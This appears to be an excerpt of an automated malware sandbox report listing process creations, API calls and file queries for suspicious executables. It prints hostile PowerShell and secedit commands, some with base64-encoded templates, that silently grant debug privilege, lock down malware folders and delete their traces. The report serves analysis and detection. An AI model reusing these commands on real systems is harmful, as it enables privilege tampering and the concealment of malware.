Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	2_2_0000000180037058
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,	2_2_000000018003715C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,	2_2_0000000180037244
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,	2_2_00000001800372F8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,	2_2_000000018003D408
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoW,	2_2_000000018003A528
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,	2_2_000000018003A584
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,	2_2_000000018003758C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: EnumSystemLocalesA,	2_2_000000018003769C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: EnumSystemLocalesA,	2_2_0000000180037730
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,	2_2_000000018003779C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	33_2_00C19EA0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	33_2_00C1A448
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	33_2_00C19E55
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	33_2_00C1A219
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	33_2_00C10E38
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	33_2_00C19FC6
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	33_2_00C19DAE
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	33_2_00C19BB3
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	33_2_00C1A342
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	33_2_00C1135E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	33_2_00C1A517
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	33_2_00C19F3B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
